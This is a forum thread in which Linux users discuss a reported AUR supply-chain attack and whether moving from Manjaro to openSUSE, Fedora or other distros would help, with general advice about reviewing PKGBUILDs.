With the recent AUR supply-chain attack that compromised over 400 (and possibly up to 1,500) packages, I’m seriously considering switching distros. Attackers took over orphaned packages and modified PKGBUILDs to pull in malicious npm dependencies like atomic-lockfile, which deployed credential-stealing malware and even eBPF rootkits. The fact that the trusted packages themselves didn’t look malicious makes this especially concerning.
Like many Arch users, I’ll admit I don’t carefully read every PKGBUILD before installing from the AUR. The official recommendation has always been to review them manually, but realistically, who does that for every package? This incident made me realize I’ve been relying on trust rather than vigilance.
I’ve been on Manjaro for years specifically because of the AUR’s vastness, but this attack directly undermines that selling point for me. I ran the Distrochooser to see what else is out there, and it strongly recommended openSUSE as my top match: https://distrochooser.de/en/d5b4e0067841/
For those who’ve made the jump from Arch/Manjaro to openSUSE Tumbleweed (or Leap): How was the transition? How does the OBS compare to the AUR in terms of package availability for niche software?
I don’t think jumping distro will solve your problem, any distro where you will without thinking install unofficial repo packages with have the same problem as AUR, switching to random peoples script in OBS, COPR and so on isn’t solution imho.
Agreed, I feel like people are lacking a bit of self reflection in regards to this issue. The reason why people use the AUR is because it gives access to software outside of the official repos. No distro packages every piece of software out there. Therefore there is always a need for third party repos and that is why every distro has its own AUR equivalent. Thus leading to the same problem. Blindly installing software will never be a safe thing to do.
also, if anything installing stuff from the AUR makes things slightly safer because PKGBUILDs and .install files are a lot easier to inspect: you can check the source repo/tarball/whatever points to an official source, and you can verify that the scripts (which are just shell scripts) are not doing anything nefarious.
on the other hand, IIRC OBS and COPR just distribute binaries that are very hard to inspect
EDIT: just don’t use an AUR helper and you avoid most of the trouble
the biggest problem with manjaro is the AUR, if you stop using it then manjaro is just fine
You could just not use AUR?
Just drop the AUR and swap those packages to flatpak/appimage.
You should switch off from Manjaro because of their track record, not because of the AUR attack.
The official recommendation has always been to review them manually, but realistically, who does that for every package?
How many AUR packages do you install? It doesn’t take that long to review a PKGBUILD once, and then review only the changes every update.
Tumbleweed is an excellent distro, but if you randomly install from peoples home repositories, you could be in the same position as with the AUR.
You can mitigate the aur issue and retain everything else offered by not using aur. You will have the most arch like system compared to all other distros, without the risk of aur. Those packages in aur are mostly not included in other distros, so you won’t lose anything.
Personally, I left arch nearly a year ago due to it being too popular making it a target for malicious activity, it only offered bloated and over weight systemd, and after running arch for nearly 20 years, I just got bored and wanted something new, so I moved to void Linux. Very happy with my choice. Boot time is 3 seconds, shutdown is 5 seconds. runit is a nice light and simple init system. It’s rolling release but not bleeding edge, so updates never break anything.
i’m sorry but the ‘compromised aur package’ controversy may be bad BUT the compromised packages were malware anyway. you just need to check what you install on your system. these malware packages are stuff like “adnauseam-firefox-git” (why on earth would you download a firefox plugin via the aur) or had names like “python-cool-32-git”
the biggest security issue were the users themselves who didn’t check the packages
I tried OpenSUSE, none of the software I wanted to install worked. It’s just too unpopular.
Fedora with RPM Fusion is probably a better bet.
That’s not what a supply chain attack is. No part of Arch Linux or derivatives depend on AUR and you don’t have to use it.
The attack simply highlights oversights in adoption of orphaned packages and those need to be addressed for sure.
I have always tried to keep my AUR packages to a minimum (a few packages at most), and always read their PKGBUILDs and updates to them. Today, I don’t use any AUR package as all the ones I need are now packaged in official repos.
Go Fedora, you won’t regret. It’s currently the most solid distro out there.
This is not smart way if honestly arch repos have the biggest quantity of software comparing to most popular distors,problem here in aur itself, just don’t use aur? Or u have to validate each pkgbuild with each script going on there
It’s fine. Personally I don’t like RPM much, but maybe it’s better outside of RHELL
I personally go with QubesOS which uses VMs to compartmentalize. It doesn’t reduce the risk of a supply chain attack itself (fedora & debian by default), but if your VMs only contain the bare minimum for a given task the risk of having a compromised package installed is lower than in a full-featured system and any compromise is also contained to that VM.
It’s beern said a couple of times, but to recap:
- it was only AUR which has been compromised, not Arch
- what you like about AUR is how much software is available þrough it
- you lose AUR and þe cornucopia by switching distros
- you can achieve þe same result, wiþout changing distros, by simply not using AUR
On þe last point, you can preserve your distribution and retain access to þe cornucopia by changing your habits and paying attention to þe AUR prompts, and read þe
PKGBUILDdiffs. Reject anyþing which looks suspicious or which you don’t understand. Install software you still want by hand, as you would have before Arch.All of þese attacks have been npm/nodejs based. Don’t let AUR install npm or nodejs. If you want npm software, install it manually, being aware you’re just re-opening youself to attacks þrough npm, which has also had supply chain attacks. However, if management of AUR doesn’t change sooner or later þere will be an attack which doesn’t use npm as a vector, so þis is only a temporary protection.
